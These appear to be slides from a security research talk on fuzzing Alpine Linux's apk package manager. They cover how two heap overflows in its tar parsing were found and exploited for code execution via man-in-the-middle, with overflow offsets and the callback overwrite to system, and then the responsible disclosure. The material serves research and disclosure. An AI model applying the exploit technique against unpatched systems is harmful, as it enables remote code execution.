From vulnerability discovery to code execution Exploiting Alpine Linux By Ariel Zelivansky, Security Researcher
From vulnerability discovery to code execution
Exploiting Alpine LinuxBy Ariel Zelivansky, Security Researcher
What is Alpine Linux?
● Lightweight Linux distribution
● Alpine’s motto: Small, simple and secure
● Alpine docker image only 5 MB in size
● Security in mind
○ The kernel is patched with a port of grsecurity/PaX
○ Userspace binaries compiled as PIE, NX enabled, full RELRO,
with stack smashing protection
Who uses Alpine?
● Alpine has become widely popular for use with containers (10M+ pulls)
● Many Docker images are now based on Alpine
● Docker has officially stated their support of Alpine
Researching Alpine
● What does an alpine container consist of?
○ musl libc
○ busybox userspace binaries
○ apk-tools
● What do people do with Alpine containers?
○ Download more programs!
○ apk - Alpine’s package manager
Apk
● A tool to install, upgrade and delete packages (aka a package manager)
● Historically a collection of shell scripts, now written in C
● To add a package - apk update and apk add [name]
○ Or just apk add [name] -U/--update
● Can I somehow alter packages or convince apk to downgrade packages?
Apk
● Documentation first (Alpine’s wiki)
○ /etc/apk/repositories - list of local/remote repositories
○ By default with docker image - plain http
● Prone to MITM attack
● Fortunately, an attack is not so simple
○ Packages are signed
○ See /etc/apk/keys
● What about update?
○ “A repository is simply a directory with a collection of *.apk files. The directory must include a
special index file, named APKINDEX.tar.gz to be considered a repository.”
○ Update essentially downloads and parses the APKINDEX.tar.gz file
Apk
● Signature inside archive?
● Sounds like fuzzing time
○ What’s fuzzing?
○ american fuzzy lop (afl-fuzz)
■ Finds lots of bugs (and vulnerabilities) in open
source software project)
■ Compile with afl-gcc to instrument file
Apk
● Clone apk-tools from alpine’s git repository
● Empty README
● Relevant code seems likely to be in update.c
● main is in apk.c
● After inspecting the code for a while, it appears each action is defined as an applet
Apk
● Update.c doesn't seem to do anything
○ Actual code in database.c looks for
APK_UPDATE_CACHE flag
○ After briefly learning the code, I was ready to fuzz it
● Writing my own applet
○ Read data from file (fuzzer will provide)
○ Call apk_bstream_from_file to read the file
○ Call apk_db_index_read with the data
○ Define applet, add to Makefile
● Running afl inside docker container
○ Easy to setup and reproduce
Fuzzing Apk
● Fuzzer does nothing
● Tried fuzzing different other functions, tweaked the code to allow fuzzing
● Finally, decided on fuzzing apk_tar_parse
○ Looks promising
Fuzzing Apk
● Fuzzing very slow to my experience
● Diving into the code again
○ Removed anything that might slow down the fuzzer and I don’t need
○ init_openssl
○ apk_db_init / apk_db_open
● Fuzz time
Fuzzing Apk
● Multiple crashes
● Triaging crashes with crashwalk
○ Runs through all crashes and identify the crash type
○ Suggests if exploitable
○ My final summary results in 6 different crashes
Reproducing the crash
● So far I was only able to reach the crashes in my modified code
● To reproduce with the real apk, I used a crash as a bad tar.gz file
○ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz
○ Served the file from my local server
○ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6
○ Upon running apk update, a segfault occurred!
● After a debugging session with gdb, I determined the origin of the crash
Explaining the bugs
● The result is two (similar) heap overflow vulnerabilities
● Let’s examine the relevant code (inside archive.c)
● Tar consists of blocks of 512 bytes, starting with a tar header block for each file
○ Reads tar stream in chunks, runs callback function on each chunk
● One of the fields of the header is a typeflag
○ One of its uses is to indicate special blocks, such as the “GNU long name extension”
○ This extension indicates the following block includes the name of the file (only 100 bytes
otherwise)
● How is this implemented?
Explaining the bugs
● Uses blob_realloc to allocate the buffer for the name
Explaining the bugs
● int is naturally signed
○ b->len is long, also signed
○ The comparison is signed
● Any integer bigger than the maximum of a signed integer (0x80000000)
will result in the buffer unmodified
Explaining the bugs
● The following call to is->read a huge amount of bytes will be copied to the buffer
○ AKA Heap overflow
○ As long as is->read accepts the size as unsigned
○ In the case of a tar.gz, is->read is gzi_read which accepts size_t (unsigned)
Explaining the bugs
● So to fix, make blob_realloc accept size_t!
○ Yes, but also make sure entry.size is not max int (because a +1 would overflow it)
● A similar bug occurred with a pax header block (another special block)
Developing an exploit
● I built a minimalistic tar file
○ To trigger the bug, I put a longname block with a
negative size
○ In tar size is an octal number in ASCII, I went with
0o77777777777 (-1 for a signed 32-bit integer)
Developing an exploit
● The execution crashed as expected
○ The crash was on the copy of a null-terminating zero meant for the entry.name buffer
○ entry.name was not allocated, so it pointed to null
○ entry.size was 0xffffffffffffffff (it was implicitly converted to 64-bit, it’s of type off_t)
Developing an exploit
● I created another file, with two blocks
○ First block to allocate the buffer with a size I want
○ Second buffer exploits the vulnerability with the allocated buffer
● Debugging the execution, it seems everything goes as expected
○ The buffer is allocated then overwritten
○ The code works to my advantage - is->read is gzip_read
■ gzip_read copies chunks from the source stream to the target and stop once
the source runs out!
■ No need to worry about the source’s size
Developing an exploit
● There are various known ways to exploit a heap overflow
○ Remember musl libc? Memory allocation (malloc, realloc) is done by it
○ I preferred not to research it
○ I can workaround an exploit using the code
■ Is there anything useful on the heap? A flag to change? Structs with callbacks?
■ I could simply change a callback address to execv or system
● Mitigations?
○ ASLR
○ For the sake of a proof-of-concept, ignoring ASLR
Developing an exploit
● Lots of trial and error, trying to find structs after entry.name I should overwrite
● I realized I can just use the is struct, which is used on is->read
● It is of type apk_istream
● I put a breakpoint on the call to is->read
● I calculated the delta between my buffer (entry.name) to the is struct
Developing an exploit
● I filled my tar file with 0x153a0 bytes, following 16 zero bytes
● It worked!
○ The execution crashed on 0x0000000000000000
● Next step - call system with a string I control
Developing an exploit
● is->read parameters?
○ is->read(is, entry.name, entry.size);
● Since the first parameter is itself, I could overwrite the first 8 bytes of it
with my shell string
○ The first 8 bytes are of get_meta which is not called in our context
○ I used “echo 1” as the string
○ It worked!
● New problems
○ Shell string limit is 8 bytes, too short
○ The next day I failed to reproduce the exploit
■ is->read seems to write the data in chunks, so it only writes 4 bytes and calls
is->read again (which is only partly modified)
Developing an exploit
● How would I find what’s after the is struct?
● I recover is in the file (copy the actual addresses)
● I added random bytes after it
● gis->bs pointer seems like a good choice
● It is of type apk_bstream
Developing an exploit
● gis->bs->read is used in the same manner as is->read
● It has 8 more bytes to use for the shell string (used for flags)
● I overwrote a pointer to the struct unlike is where I had overwritten the actual struct
● I put my data just 32 bytes before the is struct
○ I could put it anywhere I have control of
gis->bs->flags gis->bs->get_meta gis->bs->read gis->bs->close, is->get_meta….
overwritten to system
Developing an exploit
● It works!
Demonstration
Real attack vector
● Man-in-the-middle in an organization
○ Attacker gets code execution on any alpine
package install or update
○ Attacker gets code execution on building alpine
images
○ Signature did not help since it’s taken from inside
the tar
Final steps
● I’ve found a vulnerability, what next?
● Responsible/Coordinated disclosure
○ Estimate the impact, write a proof-of-concept if it makes sense
○ Contact the developers
■ Nearly always privately, you don’t want public disclosure
■ Work on a fix
○ Assign CVE IDs
■ Check for the correct CNA (CVE Numbering Authority)
■ Otherwise contact MITRE through their web form
○ Disclose the vulnerability online
■ For open source the oss-security mailing list is a good choice
Final steps
● The bugs I found affect all apk versions since 2.5.0_rc1
● I reached alpine’s developers on IRC
○ Discussed the issues with Timo Teräs in private emails
○ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9
■ All alpine versions from current to 3.2-stable include the fix
○ Besides fixing the bugs, Timo also implemented additional hardenings to restrict
attackers from creating a similar exploit
■ This is done by removing the use of function pointers that are saved on structs on the
heap
● I sent an advisory to oss-sec and wrote about the issue in the Twistlock’s blog
Future ideas
● Fuzzing other parts of apk
● Fuzzing other alpine tools
● Fuzzing libfetch